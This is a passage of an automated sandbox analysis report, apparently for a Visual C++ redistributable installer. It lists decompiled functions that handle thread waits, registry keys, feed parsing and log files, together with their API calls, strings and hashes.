                                                                          • Instruction ID: 236180e25136eb4c86cb0c83e046fa1e7d9bf230d3658fbf4cae5033e5cff242
                                                                          • Opcode Fuzzy Hash: b10e86133f2b8536908c3ee0d41f61edec4dff88db0f542f4a88a36fb3414127
                                                                          • Instruction Fuzzy Hash: CD01D232A40A28FBCB226E54DD02EDF7669DB80723F104167FD00BA201D7719E9496D1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0002CCF4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 53synchronizationthreadCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 36%
                                                                          			E0002CCF4(void* __ecx, void* _a4) {
				long _v8;
				long _t20;

				_t20 = 0;
				_v8 = 0;
				if(WaitForSingleObject(_a4, 0x493e0) == 0) {
					if(GetExitCodeThread(_a4,  &_v8) == 0) {
						_t24 =  <=  ? GetLastError() : _t9 & 0x0000ffff | 0x80070000;
						_t20 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t9 & 0x0000ffff | 0x80070000;
						E000137D3(0x80004005, "elevation.cpp", 0x4b1, _t20);
						_push("Failed to get cache thread exit code.");
						goto L4;
					}
				} else {
					_t27 =  <=  ? GetLastError() : _t13 & 0x0000ffff | 0x80070000;
					_t20 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t13 & 0x0000ffff | 0x80070000;
					E000137D3(0x80004005, "elevation.cpp", 0x4ac, _t20);
					_push("Failed to wait for cache thread to terminate.");
					L4:
					_push(_t20);
					E0005012F();
				}
				return _t20;
			}





                                                                          0x0002cd01
                                                                          0x0002cd03
                                                                          0x0002cd0e
                                                                          0x0002cd54
                                                                          0x0002cd67
                                                                          0x0002cd71
                                                                          0x0002cd7f
                                                                          0x0002cd84
                                                                          0x00000000
                                                                          0x0002cd84
                                                                          0x0002cd10
                                                                          0x0002cd21
                                                                          0x0002cd2b
                                                                          0x0002cd39
                                                                          0x0002cd3e
                                                                          0x0002cd89
                                                                          0x0002cd89
                                                                          0x0002cd8a
                                                                          0x0002cd90
                                                                          0x0002cd97

                                                                          APIs
                                                                          • WaitForSingleObject.KERNEL32(00000001,000493E0,00000000,?,?,0002D134,00000000,?,?,0002C59C,00000001,?,?,?,?,?), ref: 0002CD06
                                                                          • GetLastError.KERNEL32(?,?,0002D134,00000000,?,?,0002C59C,00000001,?,?,?,?,?,00000000,00000000,?), ref: 0002CD10
                                                                          • GetExitCodeThread.KERNEL32(00000001,?,?,?,0002D134,00000000,?,?,0002C59C,00000001,?,?,?,?,?,00000000), ref: 0002CD4C
                                                                          • GetLastError.KERNEL32(?,?,0002D134,00000000,?,?,0002C59C,00000001,?,?,?,?,?,00000000,00000000,?), ref: 0002CD56
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$CodeExitObjectSingleThreadWait
                                                                          • String ID: @Met$Failed to get cache thread exit code.$Failed to wait for cache thread to terminate.$elevation.cpp
                                                                          • API String ID: 3686190907-2950994014
                                                                          • Opcode ID: 3472b244d2230f86bf09e420973a1a44754d8bbbf38da17e25da1e3e89da1545
                                                                          • Instruction ID: 79e191acdefa7604294b217bd52e203ba5fe50f69ec17d5c8a760857e46b5167
                                                                          • Opcode Fuzzy Hash: 3472b244d2230f86bf09e420973a1a44754d8bbbf38da17e25da1e3e89da1545
                                                                          • Instruction Fuzzy Hash: 73012872B407346BFB206BB99C06BAF79D9DF04792F010125FE09EA090E7658E0081EA
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000267B0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52synchronizationthreadCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 37%
                                                                          			E000267B0(void* __ecx, void* _a4) {
				long _v8;

				_v8 = _v8 & 0x00000000;
				if(WaitForSingleObject(_a4, 0xffffffff) == 0) {
					if(GetExitCodeThread(_a4,  &_v8) == 0) {
						_t24 =  <=  ? GetLastError() : _t14 & 0x0000ffff | 0x80070000;
						_t25 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t14 & 0x0000ffff | 0x80070000;
						_v8 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t14 & 0x0000ffff | 0x80070000;
						E000137D3(0x80004005, "core.cpp", 0x630, _t25);
						_push("Failed to get cache thread exit code.");
						goto L4;
					}
				} else {
					_t30 =  <=  ? GetLastError() : _t18 & 0x0000ffff | 0x80070000;
					_t31 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t18 & 0x0000ffff | 0x80070000;
					_v8 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t18 & 0x0000ffff | 0x80070000;
					E000137D3(0x80004005, "core.cpp", 0x62b, _t31);
					_push("Failed to wait for cache thread to terminate.");
					L4:
					_push(_v8);
					E0005012F();
				}
				return _v8;
			}




                                                                          0x000267b4
                                                                          0x000267c5
                                                                          0x0002680e
                                                                          0x00026821
                                                                          0x0002682b
                                                                          0x00026839
                                                                          0x0002683c
                                                                          0x00026841
                                                                          0x00000000
                                                                          0x00026841
                                                                          0x000267c7
                                                                          0x000267d8
                                                                          0x000267e2
                                                                          0x000267f0
                                                                          0x000267f3
                                                                          0x000267f8
                                                                          0x00026846
                                                                          0x00026846
                                                                          0x00026849
                                                                          0x0002684f
                                                                          0x00026856

                                                                          APIs
                                                                          • WaitForSingleObject.KERNEL32(00000001,000000FF,00000000,?,00026CFB,00014740,?,00000000,?,00000000,00000001), ref: 000267BD
                                                                          • GetLastError.KERNEL32(?,00026CFB,00014740,?,00000000,?,00000000,00000001), ref: 000267C7
                                                                          • GetExitCodeThread.KERNEL32(00000001,00000000,?,00026CFB,00014740,?,00000000,?,00000000,00000001), ref: 00026806
                                                                          • GetLastError.KERNEL32(?,00026CFB,00014740,?,00000000,?,00000000,00000001), ref: 00026810
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$CodeExitObjectSingleThreadWait
                                                                          • String ID: @Met$Failed to get cache thread exit code.$Failed to wait for cache thread to terminate.$core.cpp
                                                                          • API String ID: 3686190907-3423812259
                                                                          • Opcode ID: d671c7dd506bb008f0b123cc8d45fc8da03f56a045c4d7be1dbc6e830329b5cb
                                                                          • Instruction ID: e5ca3b34ace2796d7484b302914e18dcc3597b7287a46ad3fca3576ba80fd93c
                                                                          • Opcode Fuzzy Hash: d671c7dd506bb008f0b123cc8d45fc8da03f56a045c4d7be1dbc6e830329b5cb
                                                                          • Instruction Fuzzy Hash: FC018070744305BBFB089BA5DD16BBE76E9EF00711F10412DB906D91E0EB3ADE00A628
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0005837F Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 156COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 92%
                                                                          			E0005837F(void* __ecx, void* __eflags, signed int _a4, intOrPtr* _a8) {
				short* _v8;
				void* __ebx;
				void* __edi;
				signed int _t45;
				signed int _t51;
				short* _t52;
				signed int _t55;
				signed int _t64;
				short* _t67;
				short** _t75;
				short* _t81;
				intOrPtr* _t84;

				_t81 = 0;
				_t84 = E000138D4(0x10, 1);
				_t75 =  *(_a4 + 0x44);
				while(_t75 != 0) {
					if(CompareStringW(0x7f, 0,  *_t75, 0xffffffff, L"http://appsyndication.org/2006/appsyn", 0xffffffff) != 2 || CompareStringW(0x7f, 0, _t75[1], 0xffffffff, L"application", 0xffffffff) != 2) {
						L9:
						_t75 = _t75[4];
						continue;
					} else {
						_t81 = E000121A5(_t84, _t75[2], 0);
						if(_t81 < 0) {
							L29:
							if(_t84 != 0) {
								E00058530(_t75, _t81, _t84);
							}
							return _t81;
						}
						_t67 = _t75[3];
						while(1) {
							_v8 = _t67;
							if(_t67 == 0) {
								goto L9;
							}
							_t6 =  &(_t67[2]); // 0x700079
							if(CompareStringW(0x7f, 0,  *_t6, 0xffffffff, L"type", 0xffffffff) != 2) {
								L7:
								_t67 = _v8[6];
								continue;
							}
							_t9 = _t84 + 4; // 0x4
							_t81 = E000121A5(_t9, _v8[4], 0);
							if(_t81 < 0) {
								goto L29;
							}
							goto L7;
						}
						goto L9;
					}
				}
				_t75 = _a4;
				_t44 = _t75[0xc];
				if(_t75[0xc] == 0) {
					L22:
					_t45 =  *(_t84 + 8);
					if(_t45 == _t75[0xc]) {
						L28:
						 *_a8 = _t84;
						_t84 = 0;
						goto L29;
					}
					if(_t45 == 0) {
						if( *(_t84 + 0xc) != 0) {
							E00013999( *(_t84 + 0xc));
							 *(_t84 + 0xc) =  *(_t84 + 0xc) & 0x00000000;
						}
						goto L28;
					}
					_t51 = E00013A72( *(_t84 + 0xc), _t45 << 6, 0);
					 *(_t84 + 0xc) = _t51;
					if(_t51 != 0) {
						goto L28;
					}
					_t52 = 0x8007000e;
					_push(0x8007000e);
					_push(0x6c);
					L14:
					_push("apuputil.cpp");
					_t81 = _t52;
					E000137D3(_t52);
					goto L29;
				}
				_t55 = E000138D4(_t44 << 6, 1);
				 *(_t84 + 0xc) = _t55;
				if(_t55 != 0) {
					_a4 = _a4 & 0x00000000;
					if(_t75[0xc] <= 0) {
						L21:
						E0005A280( *(_t84 + 0xc),  *(_t84 + 8), 0x40, E00057D0A, 0);
						goto L22;
					}
					_t78 = 0;
					_v8 = 0;
					while(1) {
						_t81 = E00057FEC(_t75[0xd] + _t78,  *_t84, ( *(_t84 + 8) << 6) +  *(_t84 + 0xc));
						if(_t81 < 0) {
							goto L29;
						}
						if(_t81 != 1) {
							 *(_t84 + 8) =  *(_t84 + 8) + 1;
						}
						_t64 = _a4 + 1;
						_t78 =  &(_v8[0x20]);
						_a4 = _t64;
						_v8 =  &(_v8[0x20]);
						if(_t64 < _t75[0xc]) {
							continue;
						} else {
							goto L21;
						}
					}
					goto L29;
				}
				_t52 = 0x8007000e;
				_push(0x8007000e);
				_push(0x54);
				goto L14;
			}















                                                                          0x0005838a
                                                                          0x00058394
                                                                          0x00058396
                                                                          0x00058433
                                                                          0x000583b6
                                                                          0x00058430
                                                                          0x00058430
                                                                          0x00000000
                                                                          0x000583d3
                                                                          0x000583de
                                                                          0x000583e2
                                                                          0x0005851b
                                                                          0x0005851d
                                                                          0x00058520
                                                                          0x00058520
                                                                          0x0005852d
                                                                          0x0005852d
                                                                          0x000583e8
                                                                          0x00058429
                                                                          0x00058429
                                                                          0x0005842e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000583f6
                                                                          0x00058406
                                                                          0x00058423
                                                                          0x00058426
                                                                          0x00000000
                                                                          0x00058426
                                                                          0x00058410
                                                                          0x00058419
                                                                          0x0005841d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0005841d
                                                                          0x00000000
                                                                          0x00058429
                                                                          0x000583b6
                                                                          0x0005843b
                                                                          0x0005843e
                                                                          0x00058443
                                                                          0x000584d4
                                                                          0x000584d4
                                                                          0x000584da
                                                                          0x00058514
                                                                          0x00058517
                                                                          0x00058519
                                                                          0x00000000
                                                                          0x00058519
                                                                          0x000584de
                                                                          0x00058506
                                                                          0x0005850b
                                                                          0x00058510
                                                                          0x00058510
                                                                          0x00000000
                                                                          0x00058506
                                                                          0x000584e9
                                                                          0x000584ee
                                                                          0x000584f3
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000584f5
                                                                          0x000584fa
                                                                          0x000584fb
                                                                          0x00058463
                                                                          0x00058463
                                                                          0x00058468
                                                                          0x0005846a
                                                                          0x00000000
                                                                          0x0005846a
                                                                          0x0005844f
                                                                          0x00058454
                                                                          0x00058459
                                                                          0x00058474
                                                                          0x0005847c
                                                                          0x000584bd
                                                                          0x000584cc
                                                                          0x00000000
                                                                          0x000584d1
                                                                          0x0005847e
                                                                          0x00058480
                                                                          0x00058483
                                                                          0x0005849a
                                                                          0x0005849e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000584a3
                                                                          0x000584a5
                                                                          0x000584a5
                                                                          0x000584ae
                                                                          0x000584af
                                                                          0x000584b2
                                                                          0x000584b5
                                                                          0x000584bb
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000584bb
                                                                          0x00000000
                                                                          0x00058483
                                                                          0x0005845b
                                                                          0x00058460
                                                                          0x00058461
                                                                          0x00000000

                                                                          APIs
                                                                            • Part of subcall function 000138D4: GetProcessHeap.KERNEL32(?,000001C7,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138E5
                                                                            • Part of subcall function 000138D4: RtlAllocateHeap.NTDLL(00000000,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138EC
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000010,00000001,00000000,00000000,00000000,?,?,00038E1F,000002C0,00000100), ref: 000583AD
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,application,000000FF,?,?,00038E1F,000002C0,00000100,000002C0,000002C0,00000100,000002C0,00000410), ref: 000583C8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CompareHeapString$AllocateProcess
                                                                          • String ID: application$apuputil.cpp$http://appsyndication.org/2006/appsyn$type
                                                                          • API String ID: 2664528157-4206478990
                                                                          • Opcode ID: 30ad11add63eb4d1bc5ffc8980d4ed17e9e71841edc4c95e1c92a40926ba4a14
                                                                          • Instruction ID: 2698e9562e25fa53718da2bec120a321559960de60e3402b403a752288befcd5
                                                                          • Opcode Fuzzy Hash: 30ad11add63eb4d1bc5ffc8980d4ed17e9e71841edc4c95e1c92a40926ba4a14
                                                                          • Instruction Fuzzy Hash: F751AF31604702ABEB618F54CC85F6B77A5AB04762F20C214FD69AB2D2DF75E944CB10
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00020419 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 133registryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 70%
                                                                          			E00020419(void* __ecx, void* __edx, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _t65;
				void* _t68;
				void* _t72;
				void* _t74;
				intOrPtr* _t75;
				void* _t77;
				void* _t78;

				_t72 = __edx;
				_t68 = __ecx;
				_t75 = _a4;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				_push(E00023C30( *((intOrPtr*)(_t75 + 8))));
				_push(E00024224(_a16));
				_push(E00024257(_a12));
				E0001550F(2, 0x20000174,  *((intOrPtr*)(_t75 + 0x50)));
				_t78 = _t77 + 0x18;
				if(_a16 != 0) {
					_t65 = E00011F20( &_v16, L"%ls.RebootRequired",  *((intOrPtr*)(_t75 + 0x50)));
					_t78 = _t78 + 0xc;
					if(_t65 < 0) {
						L3:
						_push("Failed to write volatile reboot required registry key.");
						E0005012F();
						_t68 = _t65;
					} else {
						_t65 = E00050AD5(_t68,  *((intOrPtr*)(_t75 + 0x4c)), _v16, 0x20006, 1, 0,  &_v12, 0);
						if(_t65 < 0) {
							goto L3;
						}
					}
				}
				if(_a12 != 0) {
					_t74 = E00050E3F( *((intOrPtr*)(_t75 + 0x4c)),  *((intOrPtr*)(_t75 + 0x50)), 0x20006,  &_v8);
					__eflags = _t74;
					if(_t74 >= 0) {
						goto L14;
					} else {
						_push("Failed to open registration key.");
						goto L16;
					}
				} else {
					if(_a20 == 1 || _a20 == 2) {
						E0003840F(_t68, _t75);
					}
					if( *((intOrPtr*)(_t75 + 0x9c)) != 0) {
						E0001EEF9(_t68, _t75);
					}
					_t19 = _t75 + 0x94; // 0x95
					E0001EE0F(_a8, _t19);
					_t74 = E00050B49(_t68,  *((intOrPtr*)(_t75 + 0x4c)),  *((intOrPtr*)(_t75 + 0x50)), 0, 0);
					if(_t74 == 0x80070002 || _t74 >= 0) {
						E0002A66C(_t68, _t72,  *_t75,  *((intOrPtr*)(_t75 + 0x10)));
						L14:
						__eflags = _a16 - 2;
						_t74 = E0001F09D(_t72, _a16 - 2, _t75, _v8, _a12, 0 | _a16 == 0x00000002);
						__eflags = _t74;
						if(_t74 < 0) {
							_push("Failed to update resume mode.");
							L16:
							_push(_t74);
							E0005012F();
						}
					} else {
						E0005012F(_t74, "Failed to delete registration key: %ls",  *((intOrPtr*)(_t75 + 0x50)));
					}
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
					_v8 = _v8 & 0x00000000;
				}
				if(_v12 != 0) {
					RegCloseKey(_v12);
					_v12 = _v12 & 0x00000000;
				}
				if(_v16 != 0) {
					E000554EF(_v16);
				}
				return _t74;
			}













                                                                          0x00020419
                                                                          0x00020419
                                                                          0x00020420
                                                                          0x00020426
                                                                          0x0002042c
                                                                          0x0002042f
                                                                          0x00020437
                                                                          0x00020440
                                                                          0x00020449
                                                                          0x00020454
                                                                          0x00020459
                                                                          0x0002045f
                                                                          0x0002046d
                                                                          0x00020472
                                                                          0x00020477
                                                                          0x00020495
                                                                          0x00020495
                                                                          0x0002049b
                                                                          0x000204a1
                                                                          0x00020479
                                                                          0x0002048c
                                                                          0x00020493
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00020493
                                                                          0x00020477
                                                                          0x000204a5
                                                                          0x0002058b
                                                                          0x0002058d
                                                                          0x0002058f
                                                                          0x00000000
                                                                          0x00020591
                                                                          0x00020591
                                                                          0x00000000
                                                                          0x00020591
                                                                          0x000204ab
                                                                          0x000204af
                                                                          0x000204b8
                                                                          0x000204b8
                                                                          0x000204c3
                                                                          0x000204c6
                                                                          0x000204c6
                                                                          0x000204cb
                                                                          0x000204d5
                                                                          0x000204e7
                                                                          0x000204ef
                                                                          0x0002050d
                                                                          0x00020512
                                                                          0x00020514
                                                                          0x00020528
                                                                          0x0002052a
                                                                          0x0002052c
                                                                          0x0002052e
                                                                          0x00020533
                                                                          0x00020533
                                                                          0x00020534
                                                                          0x0002053a
                                                                          0x000204f5
                                                                          0x000204fe
                                                                          0x00020503
                                                                          0x000204ef
                                                                          0x00020545
                                                                          0x0002054a
                                                                          0x0002054c
                                                                          0x0002054c
                                                                          0x00020554
                                                                          0x00020559
                                                                          0x0002055b
                                                                          0x0002055b
                                                                          0x00020563
                                                                          0x00020568
                                                                          0x00020568
                                                                          0x00020574

                                                                          APIs
                                                                          • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,?,?,00000000,?), ref: 0002054A
                                                                          • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,?,?,00000000,?), ref: 00020559
                                                                            • Part of subcall function 00050AD5: RegCreateKeyExW.ADVAPI32(00000001,00000000,00000000,00000000,00000000,00000001,00000000,?,00000000,00000001,?,?,00020491,?,00000000,00020006), ref: 00050AFA
                                                                          Strings
                                                                          • Failed to update resume mode., xrefs: 0002052E
                                                                          • %ls.RebootRequired, xrefs: 00020467
                                                                          • Failed to open registration key., xrefs: 00020591
                                                                          • Failed to write volatile reboot required registry key., xrefs: 00020495
                                                                          • Failed to delete registration key: %ls, xrefs: 000204F8
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Close$Create
                                                                          • String ID: %ls.RebootRequired$Failed to delete registration key: %ls$Failed to open registration key.$Failed to update resume mode.$Failed to write volatile reboot required registry key.
                                                                          • API String ID: 359002179-2517785395
                                                                          • Opcode ID: 63e6d6c7bee54bb067c252bb1abe62458f5deebb253537830981789055ac7733
                                                                          • Instruction ID: 597f4d54871c8ea76cd4fa09b8e4b8b97c66986e68332780d752bd800b75facd
                                                                          • Opcode Fuzzy Hash: 63e6d6c7bee54bb067c252bb1abe62458f5deebb253537830981789055ac7733
                                                                          • Instruction Fuzzy Hash: E941A231900728FBDF22AFA1EC02EEF7BBAAF40311F144469FA4562053D7729A54DB51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0005041B Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 118fileCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 87%
                                                                          			E0005041B(void* __ecx, void* __edx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				char _v8;
				void* __ebx;
				void* __esi;
				intOrPtr* _t17;
				void* _t24;
				void* _t26;
				intOrPtr _t27;
				intOrPtr _t30;
				void* _t41;
				void* _t42;
				void* _t44;

				_t42 = __edi;
				_t41 = __edx;
				_t40 = __ecx;
				_push(__ecx);
				_v8 = 0;
				EnterCriticalSection(0x7b60c);
				_t17 = _a16;
				if(_t17 == 0 ||  *_t17 == 0) {
					_t44 = E00012D79(_t40, _a4, _a8, 0x7b604);
					if(_t44 < 0) {
						goto L21;
					}
					_t44 = E00013446(_t40,  *0x7b604,  &_v8);
					if(_t44 < 0) {
						goto L21;
					}
					_t44 = E00014013(_v8, 0);
					if(_t44 < 0) {
						goto L21;
					}
					_push(0);
					_push(0x80);
					_t24 = 2;
					_t40 = 4;
					_t25 =  !=  ? _t40 : _t24;
					_t26 = CreateFileW( *0x7b604, 0x40000000, 1, 0,  !=  ? _t40 : _t24, ??, ??);
					 *0x7a774 = _t26;
					if(_t26 != 0xffffffff) {
						L11:
						if(_a20 != 0) {
							SetFilePointer(_t26, 0, 0, 2);
						}
						goto L13;
					}
					_t44 =  <=  ? GetLastError() : _t34 & 0x0000ffff | 0x80070000;
					if(_t44 >= 0) {
						_t26 =  *0x7a774; // 0xffffffff
						goto L11;
					}
					E000137D3(_t34, "logutil.cpp", 0x81, _t44);
					goto L21;
				} else {
					_t44 = E00012DE0(_t40, _a4, _a8, _a12, _t17, 0x7b604, 0x7a774);
					if(_t44 < 0) {
						L21:
						LeaveCriticalSection(0x7b60c);
						if(_v8 != 0) {
							E000554EF(_v8);
						}
						return _t44;
					} else {
						L13:
						if(_a24 != 0) {
							E000501F0(0, _t41, _t42, _t44);
						}
						_t27 =  *0x7b608; // 0x0
						if(_t27 != 0) {
							E00050658(_t40, _t41, _t27);
							_t30 =  *0x7b608; // 0x0
							if(_t30 != 0) {
								E000554EF(_t30);
								 *0x7b608 = 0;
							}
						}
						if(_a28 == 0) {
							L20:
							 *0x7b634 = 0;
							goto L21;
						} else {
							_t44 = E000121A5(_a28,  *0x7b604, 0);
							if(_t44 < 0) {
								goto L21;
							}
							goto L20;
						}
					}
				}
			}














                                                                          0x0005041b
                                                                          0x0005041b
                                                                          0x0005041b
                                                                          0x0005041e
                                                                          0x00050428
                                                                          0x0005042b
                                                                          0x00050431
                                                                          0x00050436
                                                                          0x00050475
                                                                          0x00050479
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0005048e
                                                                          0x00050492
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000504a1
                                                                          0x000504a5
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000504ae
                                                                          0x000504af
                                                                          0x000504b6
                                                                          0x000504b9
                                                                          0x000504ba
                                                                          0x000504cc
                                                                          0x000504d2
                                                                          0x000504da
                                                                          0x0005050b
                                                                          0x0005050e
                                                                          0x00050515
                                                                          0x00050515
                                                                          0x00000000
                                                                          0x0005050e
                                                                          0x000504ed
                                                                          0x000504f2
                                                                          0x00050506
                                                                          0x00000000
                                                                          0x00050506
                                                                          0x000504ff
                                                                          0x00000000
                                                                          0x0005043d
                                                                          0x00050456
                                                                          0x0005045a
                                                                          0x00050569
                                                                          0x0005056e
                                                                          0x00050577
                                                                          0x0005057c
                                                                          0x0005057c
                                                                          0x00050588
                                                                          0x00050460
                                                                          0x0005051b
                                                                          0x0005051e
                                                                          0x00050520
                                                                          0x00050520
                                                                          0x00050525
                                                                          0x0005052c
                                                                          0x0005052f
                                                                          0x00050534
                                                                          0x0005053b
                                                                          0x0005053e
                                                                          0x00050543
                                                                          0x00050543
                                                                          0x0005053b
                                                                          0x0005054c
                                                                          0x00050563
                                                                          0x00050563
                                                                          0x00000000
                                                                          0x0005054e
                                                                          0x0005055d
                                                                          0x00050561
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00050561
                                                                          0x0005054c
                                                                          0x0005045a

                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(0007B60C,00000000,?,?,?,00015407,00000000,Setup,_Failed,txt,00000000,00000000,00000000,?,?,?), ref: 0005042B
                                                                          • CreateFileW.KERNEL32(40000000,00000001,00000000,00000002,00000080,00000000,?,00000000,?,?,?,0007B604,?,00015407,00000000,Setup), ref: 000504CC
                                                                          • GetLastError.KERNEL32(?,00015407,00000000,Setup,_Failed,txt,00000000,00000000,00000000,?,?,?), ref: 000504DC
                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00015407,00000000,Setup,_Failed,txt,00000000,00000000,00000000,?,?,?), ref: 00050515
                                                                            • Part of subcall function 00012DE0: GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 00012F1F
                                                                          • LeaveCriticalSection.KERNEL32(0007B60C,?,?,0007B604,?,00015407,00000000,Setup,_Failed,txt,00000000,00000000,00000000,?,?,?), ref: 0005056E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalFileSection$CreateEnterErrorLastLeaveLocalPointerTime
                                                                          • String ID: @Met$logutil.cpp
                                                                          • API String ID: 4111229724-637279948
                                                                          • Opcode ID: 62a092bb9782139ce1a856c10834251643a88a05907092470fc3d27245c37fd0
                                                                          • Instruction ID: ccd8aafbdb40b3a8d1197b991dba696e492785909a7cbd321ed858fad3de854d
                                                                          • Opcode Fuzzy Hash: 62a092bb9782139ce1a856c10834251643a88a05907092470fc3d27245c37fd0
                                                                          • Instruction Fuzzy Hash: 07316671E01B15AFEB21AF61DC46FAF36A8EB00752F004125FF04AA161E73DDD949B90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0002D01A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 117threadCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 64%
